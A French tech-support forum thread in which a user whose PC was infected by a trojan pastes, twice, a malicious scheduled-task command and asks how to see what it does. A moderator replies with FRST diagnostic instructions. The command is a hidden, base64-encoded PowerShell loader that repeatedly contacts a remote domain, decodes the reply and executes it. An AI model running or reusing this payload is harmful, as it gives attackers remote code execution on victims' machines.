Cheval de troie
KingkoPop
-
bazfile Messages postés 58595 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
bazfile Messages postés 58595 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjours, J'ai eu un cheval de troie qui a infecté ma machine et j'ai vue qu'ils m'ont rajouté des tache dans le planificateur nottement celui la que j'ai du mal a comprendre:
Dans l'invite de commande il fait cette commande:
/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.
Ma question est: Comment on peut retrouvé cette chose ?
Merci d'avance !
Dans l'invite de commande il fait cette commande:
/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.
Ma question est: Comment on peut retrouvé cette chose ?
Merci d'avance !
A voir également:
- Cheval de troie
- Comment supprimer cheval de troie gratuitement - Télécharger - Antivirus & Antimalwares
- Ordinateur bloqué cheval de troie - Accueil - Arnaque
- Cheval de troie virus - Accueil - Virus
- Jeux de petit chevaux gratuit à télécharger - Télécharger - Jeux vidéo
- Skyrim retrouver son cheval - Forum Jeux PC
2 réponses
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention, attendre que les messages disant que l'analyse est terminée s'affichent
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Bonjour,
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3